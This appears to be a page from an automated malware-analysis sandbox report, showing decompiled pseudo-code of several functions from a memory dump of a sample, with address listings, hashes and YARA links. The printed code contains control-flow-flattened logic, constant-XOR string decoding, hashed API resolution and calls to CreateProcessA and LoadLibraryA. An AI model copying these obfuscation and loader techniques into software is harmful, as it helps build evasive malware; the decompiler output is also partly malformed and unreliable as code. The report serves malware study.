                                                                                                                                                        0x0045ac64
                                                                                                                                                        0x0045ac64
                                                                                                                                                        0x0045ac69
                                                                                                                                                        0x0045ac71
                                                                                                                                                        0x0045ac79
                                                                                                                                                        0x0045ac7e
                                                                                                                                                        0x0045ac83
                                                                                                                                                        0x0045ac8b
                                                                                                                                                        0x0045ac90
                                                                                                                                                        0x0045ac95
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045ac39
                                                                                                                                                        0x0045ac3b
                                                                                                                                                        0x0045ac57
                                                                                                                                                        0x0045ac5b
                                                                                                                                                        0x0045ac5e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045ac3b
                                                                                                                                                        0x0045ac37
                                                                                                                                                        0x0045a9ca
                                                                                                                                                        0x0045ad13
                                                                                                                                                        0x0045b524
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b524
                                                                                                                                                        0x0045ad1e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045ad29
                                                                                                                                                        0x0045ad2f
                                                                                                                                                        0x0045ad2f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045ad29
                                                                                                                                                        0x0045a9d5
                                                                                                                                                        0x0045ae74
                                                                                                                                                        0x0045b30f
                                                                                                                                                        0x0045b313
                                                                                                                                                        0x0045b318
                                                                                                                                                        0x0045b320
                                                                                                                                                        0x0045b328
                                                                                                                                                        0x0045b330
                                                                                                                                                        0x0045b338
                                                                                                                                                        0x0045b340
                                                                                                                                                        0x0045b348
                                                                                                                                                        0x0045b350
                                                                                                                                                        0x0045b358
                                                                                                                                                        0x0045b360
                                                                                                                                                        0x0045b368
                                                                                                                                                        0x0045b370
                                                                                                                                                        0x0045b378
                                                                                                                                                        0x0045b380
                                                                                                                                                        0x0045b38b
                                                                                                                                                        0x0045b396
                                                                                                                                                        0x0045b3a1
                                                                                                                                                        0x0045b3ac
                                                                                                                                                        0x0045b3b7
                                                                                                                                                        0x0045b3c2
                                                                                                                                                        0x0045b3cd
                                                                                                                                                        0x0045b3d8
                                                                                                                                                        0x0045b3e3
                                                                                                                                                        0x0045b3ee
                                                                                                                                                        0x0045b3f9
                                                                                                                                                        0x0045b404
                                                                                                                                                        0x0045b40f
                                                                                                                                                        0x0045b41a
                                                                                                                                                        0x0045b425
                                                                                                                                                        0x0045b430
                                                                                                                                                        0x0045b43b
                                                                                                                                                        0x0045b44b
                                                                                                                                                        0x0045b47a
                                                                                                                                                        0x0045b47a
                                                                                                                                                        0x0045b47f
                                                                                                                                                        0x0045b48f
                                                                                                                                                        0x0045b494
                                                                                                                                                        0x0045b499
                                                                                                                                                        0x0045b4a1
                                                                                                                                                        0x0045b4ae
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b4ae
                                                                                                                                                        0x0045b454
                                                                                                                                                        0x0045b46a
                                                                                                                                                        0x0045b46e
                                                                                                                                                        0x0045b471
                                                                                                                                                        0x0045b474
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b454
                                                                                                                                                        0x0045ae7f
                                                                                                                                                        0x0045aea2
                                                                                                                                                        0x0045aea2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045ae7f
                                                                                                                                                        0x0045a9e0
                                                                                                                                                        0x0045af96
                                                                                                                                                        0x0045af9b
                                                                                                                                                        0x0045afa3
                                                                                                                                                        0x0045afa8
                                                                                                                                                        0x0045afb0
                                                                                                                                                        0x0045afb8
                                                                                                                                                        0x0045afc5
                                                                                                                                                        0x0045affa
                                                                                                                                                        0x0045affa
                                                                                                                                                        0x0045b00a
                                                                                                                                                        0x0045b015
                                                                                                                                                        0x0045b01a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b01a
                                                                                                                                                        0x0045afce
                                                                                                                                                        0x0045afea
                                                                                                                                                        0x0045afee
                                                                                                                                                        0x0045aff1
                                                                                                                                                        0x0045aff4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045a9e6
                                                                                                                                                        0x0045a9eb
                                                                                                                                                        0x0045aa0b
                                                                                                                                                        0x0045aa17
                                                                                                                                                        0x0045aa1d
                                                                                                                                                        0x0045aa23
                                                                                                                                                        0x0045aa28
                                                                                                                                                        0x0045aa30
                                                                                                                                                        0x0045aa36
                                                                                                                                                        0x0045aa43
                                                                                                                                                        0x0045aa49
                                                                                                                                                        0x0045aa4c
                                                                                                                                                        0x0045aa52
                                                                                                                                                        0x0045aa60
                                                                                                                                                        0x0045aa60
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045a9eb
                                                                                                                                                        0x0045a9e0
                                                                                                                                                        0x0045a9af

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000012.00000002.434902684.0000000000451000.00000020.00000001.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                        • Associated: 00000012.00000002.434893531.0000000000450000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434916593.0000000000464000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434932447.0000000000467000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                        • String ID: =,$C2&$R52$U8
                                                                                                                                                        • API String ID: 779948276-961738214
                                                                                                                                                        • Opcode ID: 4e706b12c5a299a31bdf86c5b9ea6ba360387ec96d78adcbcf596322af4426cd
                                                                                                                                                        • Instruction ID: 75104eee81d5b828f57b516b3e6a7f4b174511fc247f2ce78ab7c2b9440100fa
                                                                                                                                                        • Opcode Fuzzy Hash: 4e706b12c5a299a31bdf86c5b9ea6ba360387ec96d78adcbcf596322af4426cd
                                                                                                                                                        • Instruction Fuzzy Hash: 4142B1B62187C48ACB348F1AA45439FBB61F3C5785F20451AEBCA87B59DB3DC4498F06
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00458282, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 192processCOMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 42%
                                                                                                                                                        			E00458282(signed long long __rax, signed long long __rcx, void* __rdx, void* __r9) {
				void* _t50;
				void* _t71;
				signed int _t82;
				signed int _t86;
				signed int _t91;
				void* _t101;
				void* _t102;
				signed long long _t112;
				long long* _t113;
				signed long long _t114;
				signed long long _t118;
				signed long long _t119;
				void* _t122;
				void* _t123;
				void* _t125;
				void* _t128;
				void* _t129;

				_t116 = __rdx;
				_t114 = __rcx;
				_t112 = __rax;
				asm("movaps [esp+0x70], xmm6");
				_t128 = __r9;
				_t103 = r8d;
				_t129 = __rdx;
				E00453998(__rcx);
				_t1 = _t122 + 0x50; // 0xff390cf0
				_t118 = _t1 | _t112;
				_t101 =  ==  ? 0x11a1a452 : 0x7de529e8;
				_t50 = 0x2b8f7bbc;
				asm("xorps xmm6, xmm6");
				while(1) {
					L1:
					_t71 = _t50;
					if(_t50 <= 0x2b8f7bbb) {
						break;
					}
					if(_t71 > 0x7de529e7) {
						if(_t71 == 0x7de529e8) {
							 *(_t122 + 0x50) = 0;
							 *((intOrPtr*)(_t122 + 0x54)) = 0x69d0435b;
							 *((intOrPtr*)(_t122 + 0x58)) = 0x69d01959;
							 *((intOrPtr*)(_t122 + 0x5c)) = 0x5b43759;
							if( *(_t122 + 0x50) == 0) {
								do {
									_t91 =  *(_t122 + 0x50 + _t112 * 4);
									_t103 =  !_t91 & 0x05b43735;
									 *(_t122 + 0x50 + _t112 * 4) = _t91 & 0xfa4bc8ca |  !_t91 & 0x05b43735;
									_t114 = _t114 + 1;
									_t112 = _t112 + 1;
								} while (_t112 != 4);
							}
							_t114 = _t118;
							E00451517(_t101, _t114, _t116, _t123, _t125);
							_t50 =  ==  ? 0x7df23ede : 0x3df03fa4;
						} else {
							_t50 = _t71;
							if(_t71 == 0x7df23ede) {
								 *(_t122 + 0x50) = 0;
								 *((intOrPtr*)(_t122 + 0x54)) = 0x7139785;
								 *((intOrPtr*)(_t122 + 0x58)) = 0x29128283;
								if( *(_t122 + 0x50) == 0) {
									do {
										_t82 =  *(_t122 + 0x54 + _t112 * 4);
										_t96 =  !_t82 & 0x0eb19f8e;
										 *(_t122 + 0x54 + _t112 * 4) = (_t82 & 0xf14e6071 |  !_t82 & 0x0eb19f8e) ^ 0x27c66568;
									} while (_t112 == 0);
								}
								L23:
								_t50 = 0x9f3e05ed;
							}
						}
						continue;
						L32:
					}
					_t50 = _t101;
					if(_t71 == 0x2b8f7bbc) {
						continue;
					}
					if(_t71 == 0x3df03fa4) {
						 *(_t122 + 0x50) = 0;
						 *((intOrPtr*)(_t122 + 0x54)) = 0x16e400f6;
						 *((intOrPtr*)(_t122 + 0x58)) = 0x8f10afc;
						 *((intOrPtr*)(_t122 + 0x5c)) = 0x1fec1dbd;
						 *((intOrPtr*)(_t122 + 0x60)) = 0x7a947893;
						if( *(_t122 + 0x50) == 0) {
							do {
								_t86 =  *(_t122 + 0x54 + _t112 * 4);
								_t96 =  !_t86 & 0x7a947893;
								 *(_t122 + 0x54 + _t112 * 4) = _t86 & 0x856b876c |  !_t86 & 0x7a947893;
								_t112 = _t112 + 1;
							} while (_t112 != 4);
						}
						goto L23;
					}
					_t50 = _t71;
					if(_t71 != 0x2de3212c) {
						continue;
					}
					asm("movaps xmm6, [esp+0x70]");
					return _t50;
					goto L32;
				}
				if(_t71 > 0x11a1a451) {
					if(_t71 == 0x11a1a452) {
						E0045CDB9(0x68, _t112);
						_t119 = _t112;
						E0045CDB9(8, _t112);
						 *(_t122 + 0x68) = _t112;
						 *_t119 = 0x68;
						 *(_t119 + 0x3c) = 1;
						 *((short*)(_t119 + 0x40)) = 0;
						r8d = 0x2bf91925;
						r9d = 0x3c;
						E0045FAD7(1, _t102, _t112, _t114);
						 *((long long*)(_t122 + 0x48)) =  *(_t122 + 0x68);
						 *(_t122 + 0x40) = _t119;
						asm("movups [esp+0x30], xmm6");
						 *((intOrPtr*)(_t122 + 0x28)) = 0x8000000;
						 *((intOrPtr*)(_t122 + 0x20)) = 0;
						_t116 = _t129;
						r8d = 0;
						r9d = 0; // executed
						CreateProcessA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
						_t50 =  ==  ? 0x21139ce2 : 0xfa4d7a7c;
						goto L1;
					} else {
						_t50 = _t71;
						if(_t71 != 0x21139ce2) {
							goto L1;
						} else {
							goto L25;
						}
					}
				} else {
					if(_t71 == 0x9f3e05ed) {
						_t114 = _t118;
						_t116 = _t128;
						E00460CE8(0, _t96, _t101, _t102, _t103, _t112, _t114, _t128, _t123);
						L25:
						_t50 = 0x2de3212c;
					} else {
						_t50 = _t71;
						if(_t71 == 0xfa4d7a7c) {
							_t113 =  *(_t122 + 0x68);
							r8d = 0x2db58ff7;
							r9d = 0x11;
							E0045FAD7(1, _t102, _t113, _t114);
							 *_t113();
							_t112 =  *(_t122 + 0x68);
							_t96 = 1;
							r8d = 0x2db58ff7;
							r9d = 0x11;
							E0045FAD7(1, _t102, _t112,  *((intOrPtr*)(_t113 + 8)));
							_t114 =  *_t112;
							 *_t112();
							_t50 = 0x21139ce2;
						}
					}
					goto L1;
				}
				goto L32;
			}




















                                                                                                                                                        0x00458282
                                                                                                                                                        0x00458282
                                                                                                                                                        0x00458282
                                                                                                                                                        0x00458295
                                                                                                                                                        0x0045829a
                                                                                                                                                        0x0045829d
                                                                                                                                                        0x004582a0
                                                                                                                                                        0x004582a6
                                                                                                                                                        0x004582b0
                                                                                                                                                        0x004582b5
                                                                                                                                                        0x004582c4
                                                                                                                                                        0x004582c7
                                                                                                                                                        0x004582ce
                                                                                                                                                        0x004582d1
                                                                                                                                                        0x004582d1
                                                                                                                                                        0x004582d1
                                                                                                                                                        0x004582d8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004582e0
                                                                                                                                                        0x00458388
                                                                                                                                                        0x00458472
                                                                                                                                                        0x00458476
                                                                                                                                                        0x0045847e
                                                                                                                                                        0x00458486
                                                                                                                                                        0x00458492
                                                                                                                                                        0x0045849b
                                                                                                                                                        0x0045849b
                                                                                                                                                        0x004584a3
                                                                                                                                                        0x004584b1
                                                                                                                                                        0x004584b5
                                                                                                                                                        0x004584b8
                                                                                                                                                        0x004584bb
                                                                                                                                                        0x0045849b
                                                                                                                                                        0x004584c1
                                                                                                                                                        0x004584c6
                                                                                                                                                        0x004584e9
                                                                                                                                                        0x0045838e
                                                                                                                                                        0x0045838e
                                                                                                                                                        0x00458396
                                                                                                                                                        0x0045839c
                                                                                                                                                        0x004583a0
                                                                                                                                                        0x004583a8
                                                                                                                                                        0x004583b4
                                                                                                                                                        0x004583bc
                                                                                                                                                        0x004583bc
                                                                                                                                                        0x004583c4
                                                                                                                                                        0x004583d8
                                                                                                                                                        0x004583df
                                                                                                                                                        0x004583e6
                                                                                                                                                        0x00458453
                                                                                                                                                        0x00458453
                                                                                                                                                        0x00458453
                                                                                                                                                        0x00458396
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00458388
                                                                                                                                                        0x004582e6
                                                                                                                                                        0x004582ee
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004582f6
                                                                                                                                                        0x00458404
                                                                                                                                                        0x00458408
                                                                                                                                                        0x00458410
                                                                                                                                                        0x00458418
                                                                                                                                                        0x00458420
                                                                                                                                                        0x0045842c
                                                                                                                                                        0x00458430
                                                                                                                                                        0x00458430
                                                                                                                                                        0x00458438
                                                                                                                                                        0x00458446
                                                                                                                                                        0x0045844a
                                                                                                                                                        0x0045844d
                                                                                                                                                        0x00458430
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045842c
                                                                                                                                                        0x004582fc
                                                                                                                                                        0x00458304
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045857f
                                                                                                                                                        0x00458597
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00458597
                                                                                                                                                        0x00458311
                                                                                                                                                        0x004583ee
                                                                                                                                                        0x004584f6
                                                                                                                                                        0x004584fb
                                                                                                                                                        0x00458503
                                                                                                                                                        0x00458508
                                                                                                                                                        0x0045850d
                                                                                                                                                        0x00458514
                                                                                                                                                        0x0045851b
                                                                                                                                                        0x0045852d
                                                                                                                                                        0x00458533
                                                                                                                                                        0x00458539
                                                                                                                                                        0x0045853e
                                                                                                                                                        0x00458543
                                                                                                                                                        0x00458548
                                                                                                                                                        0x0045854d
                                                                                                                                                        0x00458555
                                                                                                                                                        0x0045855f
                                                                                                                                                        0x00458562
                                                                                                                                                        0x00458565
                                                                                                                                                        0x00458568
                                                                                                                                                        0x00458577
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004583f4
                                                                                                                                                        0x004583f4
                                                                                                                                                        0x004583fc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00458402
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00458402
                                                                                                                                                        0x004583fc
                                                                                                                                                        0x00458317
                                                                                                                                                        0x0045831d
                                                                                                                                                        0x0045845d
                                                                                                                                                        0x00458460
                                                                                                                                                        0x00458463
                                                                                                                                                        0x00458468
                                                                                                                                                        0x00458468
                                                                                                                                                        0x00458323
                                                                                                                                                        0x00458323
                                                                                                                                                        0x0045832b
                                                                                                                                                        0x0045832d
                                                                                                                                                        0x0045833d
                                                                                                                                                        0x00458343
                                                                                                                                                        0x00458349
                                                                                                                                                        0x00458351
                                                                                                                                                        0x00458353
                                                                                                                                                        0x0045835d
                                                                                                                                                        0x00458362
                                                                                                                                                        0x00458368
                                                                                                                                                        0x0045836e
                                                                                                                                                        0x00458373
                                                                                                                                                        0x00458376
                                                                                                                                                        0x00458378
                                                                                                                                                        0x00458378
                                                                                                                                                        0x0045832b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045831d
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000012.00000002.434902684.0000000000451000.00000020.00000001.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                        • Associated: 00000012.00000002.434893531.0000000000450000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434916593.0000000000464000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434932447.0000000000467000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                        • String ID: ,!-$,!-$)}$)}$)}
                                                                                                                                                        • API String ID: 963392458-3082868487
                                                                                                                                                        • Opcode ID: 9201e7a053d5d05c994b5693df976931112c07eb7d85478749a20647e1e8586b
                                                                                                                                                        • Instruction ID: 38e0093b25c8c547bc2f1d7fb1088369dc64e681d3a1ae3fe28796305a4b74f1
                                                                                                                                                        • Opcode Fuzzy Hash: 9201e7a053d5d05c994b5693df976931112c07eb7d85478749a20647e1e8586b
                                                                                                                                                        • Instruction Fuzzy Hash: F9617B713086C046DB189B5AA45532FBF50E7D6389F14412EBE86A7F46DE7CC84A8B09
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0045EFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                        			E0045EFD3(intOrPtr __edx, long long __rax, long long __rcx, void* __rdx, void* __r8, void* __r11) {
				long long _v72;
				long long _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				long long _v104;
				long long _v112;
				intOrPtr _t24;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t44;
				void* _t46;
				long long _t56;
				long long _t61;
				void* _t63;
				long long _t64;
				long long _t66;
				void* _t68;
				void* _t69;
				long long _t70;

				_t69 = __r11;
				_t68 = __r8;
				_t63 = __rdx;
				_t62 = __rcx;
				_t56 = __rax;
				_t66 = __rcx;
				_v84 = r8d;
				_t34 =  ==  ? 0x64798daa : 0x23a3853d;
				_v88 =  ==  ? 0x64798daa : 0x23a3853d;
				r13d = 0x8f34f1b0;
				r13d =  ==  ? 0x84c104ed : r13d;
				_v92 = __edx;
				r14d = 0x71c9cf43;
				r14d =  ==  ? 0xf3019199 : r14d;
				_t24 = 0xf82b818e;
				while(1) {
					L1:
					_t35 = _t24;
					if(_t24 <= 0x18bc41aa) {
						break;
					}
					if(_t35 > 0x38ab292f) {
						if(_t35 > 0x65e67dfa) {
							if(_t35 == 0x71c9cf43) {
								r12d = 0;
								_t64 = _t66;
								_t24 = r13d;
								continue;
							}
							_t24 = _t35;
							if(_t35 != 0x65e67dfb) {
								continue;
							}
							return _t24;
						}
						if(_t35 == 0x38ab2930) {
							_t56 = _v112;
							_t24 = 0x98ea932f;
							if( *_t56 != 0) {
								_t24 = 0x33675366;
							}
							L40:
							_t61 = _v104;
							continue;
						}
						_t24 = _t35;
						if(_t35 == 0x64798daa) {
							_t24 = 0x65e67dfb;
						}
						continue;
					}
					if(_t35 > 0x2f447a17) {
						if(_t35 == 0x2f447a18) {
							_t24 = 0xfaff49ef;
							continue;
						}
						_t24 = _t35;
						if(_t35 != 0x33675366) {
							continue;
						}
						r8d = 0x18d1ea71;
						r9d = 0x2b;
						E0045FAD7(1, 0, _t56, _t62);
						_t62 = _v112;
						 *_t56();
						_t61 = _t56;
						_t24 = 0x18bc41ab;
						if(_t61 == 0) {
							continue;
						}
						L32:
						_t24 = 0x98ea932f;
						continue;
					}
					if(_t35 == 0x18bc41ab) {
						r8d = 0x84161500;
						r9d = 2;
						E0045FAD7(1, 0, _t56, _t62);
						_t62 = _v112; // executed
						LoadLibraryA(??); // executed
						goto L32;
					} else {
						_t24 = _t35;
						if(_t35 == 0x23a3853d) {
							_t62 = _v72;
							E0045F29F(_v84, _t44, _t46, _v72, _t63, _t68, _t69);
							_v80 = _t56;
							_t24 = 0xe79882b1;
							if(_v80 != 0) {
								_t24 = 0x2f447a18;
							}
						}
						continue;
					}
				}
				if(_t35 <= 0xe79882b0) {
					if(_t35 == 0x84c104ed) {
						E0045F5B9(_v92);
						_t64 = _t56;
						_t24 = 0x8f34f1b0;
						r12d = 0;
						goto L1;
					}
					if(_t35 == 0x8f34f1b0) {
						_v104 = _t70;
						_v112 = _t64;
						_t62 = _v104;
						_t43 = 0x38ab2930;
						if(_v112 == _t61) {
							_t43 = 0x98ea932f;
						}
						_t24 =  ==  ? _t43 : 0x98ea932f;
						goto L40;
					}
					_t24 = _t35;
					if(_t35 == 0x98ea932f) {
						_v72 = _t61;
						_t24 = _v88;
					}
				} else {
					if(_t35 > 0xf82b818d) {
						_t24 = r14d;
						if(_t35 != 0xf82b818e) {
							_t24 = _t35;
							if(_t35 == 0xfaff49ef) {
								_t24 = 0x65e67dfb;
							}
						}
					} else {
						if(_t35 == 0xe79882b1) {
							_t24 = 0xfaff49ef;
						} else {
							_t24 = _t35;
							if(_t35 == 0xf3019199) {
								_t24 = 0x8f34f1b0;
								_t70 =  *0x465030;
								_t64 = _t66;
							}
						}
					}
				}
			}























                                                                                                                                                        0x0045efd3
                                                                                                                                                        0x0045efd3
                                                                                                                                                        0x0045efd3
                                                                                                                                                        0x0045efd3
                                                                                                                                                        0x0045efd3
                                                                                                                                                        0x0045efe3
                                                                                                                                                        0x0045efe6
                                                                                                                                                        0x0045eff8
                                                                                                                                                        0x0045effb
                                                                                                                                                        0x0045f007
                                                                                                                                                        0x0045f00d
                                                                                                                                                        0x0045f011
                                                                                                                                                        0x0045f01d
                                                                                                                                                        0x0045f023
                                                                                                                                                        0x0045f027
                                                                                                                                                        0x0045f02c
                                                                                                                                                        0x0045f02c
                                                                                                                                                        0x0045f02c
                                                                                                                                                        0x0045f033
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045f03b
                                                                                                                                                        0x0045f0d2
                                                                                                                                                        0x0045f1b4
                                                                                                                                                        0x0045f27d
                                                                                                                                                        0x0045f280
                                                                                                                                                        0x0045f283
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045f283
                                                                                                                                                        0x0045f1ba
                                                                                                                                                        0x0045f1c2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045f29e
                                                                                                                                                        0x0045f29e
                                                                                                                                                        0x0045f0de
                                                                                                                                                        0x0045f208
                                                                                                                                                        0x0045f210
                                                                                                                                                        0x0045f215
                                                                                                                                                        0x0045f217
                                                                                                                                                        0x0045f217
                                                                                                                                                        0x0045f264
                                                                                                                                                        0x0045f264
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045f264
                                                                                                                                                        0x0045f0e4
                                                                                                                                                        0x0045f0ec
                                                                                                                                                        0x0045f0f7
                                                                                                                                                        0x0045f0f7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045f0ec
                                                                                                                                                        0x0045f047
                                                                                                                                                        0x0045f13b
                                                                                                                                                        0x0045f26e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045f273
                                                                                                                                                        0x0045f141
                                                                                                                                                        0x0045f149
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045f15b
                                                                                                                                                        0x0045f161
                                                                                                                                                        0x0045f167
                                                                                                                                                        0x0045f16c
                                                                                                                                                        0x0045f16f
                                                                                                                                                        0x0045f171
                                                                                                                                                        0x0045f174
                                                                                                                                                        0x0045f17c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045f1f2
                                                                                                                                                        0x0045f1f2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045f1f2
                                                                                                                                                        0x0045f053
                                                                                                                                                        0x0045f1d9
                                                                                                                                                        0x0045f1df
                                                                                                                                                        0x0045f1e5
                                                                                                                                                        0x0045f1ea
                                                                                                                                                        0x0045f1ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045f059
                                                                                                                                                        0x0045f059
                                                                                                                                                        0x0045f061
                                                                                                                                                        0x0045f063
                                                                                                                                                        0x0045f06c
                                                                                                                                                        0x0045f071
                                                                                                                                                        0x0045f07c
                                                                                                                                                        0x0045f081
                                                                                                                                                        0x0045f083
                                                                                                                                                        0x0045f083
                                                                                                                                                        0x0045f081
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045f061
                                                                                                                                                        0x0045f053
                                                                                                                                                        0x0045f090
                                                                                                                                                        0x0045f107
                                                                                                                                                        0x0045f222
                                                                                                                                                        0x0045f227
                                                                                                                                                        0x0045f22a
                                                                                                                                                        0x0045f22f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045f22f
                                                                                                                                                        0x0045f113
                                                                                                                                                        0x0045f237
                                                                                                                                                        0x0045f23c
                                                                                                                                                        0x0045f241
                                                                                                                                                        0x0045f246
                                                                                                                                                        0x0045f257
                                                                                                                                                        0x0045f259
                                                                                                                                                        0x0045f259
                                                                                                                                                        0x0045f261
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045f261
                                                                                                                                                        0x0045f119
                                                                                                                                                        0x0045f121
                                                                                                                                                        0x0045f127
                                                                                                                                                        0x0045f12c
                                                                                                                                                        0x0045f12c
                                                                                                                                                        0x0045f092
                                                                                                                                                        0x0045f098
                                                                                                                                                        0x0045f184
                                                                                                                                                        0x0045f18d
                                                                                                                                                        0x0045f193
                                                                                                                                                        0x0045f19b
                                                                                                                                                        0x0045f1a1
                                                                                                                                                        0x0045f1a6
                                                                                                                                                        0x0045f19b
                                                                                                                                                        0x0045f09e
                                                                                                                                                        0x0045f0a4
                                                                                                                                                        0x0045f1fc
                                                                                                                                                        0x0045f0aa
                                                                                                                                                        0x0045f0aa
                                                                                                                                                        0x0045f0b2
                                                                                                                                                        0x0045f0b8
                                                                                                                                                        0x0045f0bd
                                                                                                                                                        0x0045f0c4
                                                                                                                                                        0x0045f0c4
                                                                                                                                                        0x0045f0b2
                                                                                                                                                        0x0045f0a4
                                                                                                                                                        0x0045f098

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,EA203201,079849AE,E8F2AD3B,00000095,?,?,00000001,0045FC0A,?,?,079849AE,E8F2AD3B), ref: 0045F1ED
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000012.00000002.434902684.0000000000451000.00000020.00000001.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                        • Associated: 00000012.00000002.434893531.0000000000450000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434916593.0000000000464000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434932447.0000000000467000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID: fSg3$fSg3
                                                                                                                                                        • API String ID: 1029625771-263991881
                                                                                                                                                        • Opcode ID: 3d0265caa5a6fd1482380c2ac525c3344cc87223c6ea81e310f15978c367fdea
                                                                                                                                                        • Instruction ID: 2d20772a834cdac820a755054a11308a7ccb48cc8f6a49d94531e533bdd1096f
                                                                                                                                                        • Opcode Fuzzy Hash: 3d0265caa5a6fd1482380c2ac525c3344cc87223c6ea81e310f15978c367fdea
                                                                                                                                                        • Instruction Fuzzy Hash: 7E510621314550C6DA2855B9E49023E61A0BB54BF6F6C403BFE4BCBB97D62DCC4D871B
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00453A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                        			E00453A22(long long __rax, intOrPtr __rcx, long long* __rdx) {
				long long _v32;
				intOrPtr _v36;
				signed char _t12;
				void* _t18;
				void* _t26;
				long long _t31;
				long long* _t36;

				_t32 = __rcx;
				_t31 = __rax;
				_t36 = __rdx;
				r8d = 0x7ae3257e;
				r9d = 0x42;
				E0045FAD7(1, _t26, __rax, __rcx);
				 *_t31(); // executed
				_v32 = _t31;
				r8d = 0xce1f1c4e;
				r9d = 0xc5;
				E0045FAD7(1, _t26, _t31, __rcx);
				_v36 =  *_t31();
				_t18 = 0x953bce87;
				L1:
				while(_t18 > 0x346ca2b9) {
					if(_t18 == 0x346ca2ba) {
						r8d = 0x2db58ff7;
						r9d = 0x11;
						E0045FAD7(1, _t26, _t31, _t32);
						_t32 = _v32;
						 *_t31();
						_t18 = 0x6b45cfdb;
						_t12 = 1;
						continue;
					}
					if(_t18 != 0x6b45cfdb) {
						continue;
					}
					return _t12 & 0x00000001;
				}
				if(_t18 == 0x953bce87) {
					_t18 =  ==  ? 0x346ca2ba : 0x263eb76d;
				} else {
					if(_t18 == 0x263eb76d) {
						_t31 = _v32;
						 *_t36 = _t31;
						_t18 = 0x6b45cfdb;
						_t12 = 0;
					}
				}
				goto L1;
			}










                                                                                                                                                        0x00453a22
                                                                                                                                                        0x00453a22
                                                                                                                                                        0x00453a29
                                                                                                                                                        0x00453a36
                                                                                                                                                        0x00453a3c
                                                                                                                                                        0x00453a42
                                                                                                                                                        0x00453a4e
                                                                                                                                                        0x00453a50
                                                                                                                                                        0x00453a5c
                                                                                                                                                        0x00453a62
                                                                                                                                                        0x00453a68
                                                                                                                                                        0x00453a6f
                                                                                                                                                        0x00453a73
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00453a7d
                                                                                                                                                        0x00453aac
                                                                                                                                                        0x00453ad8
                                                                                                                                                        0x00453ade
                                                                                                                                                        0x00453ae4
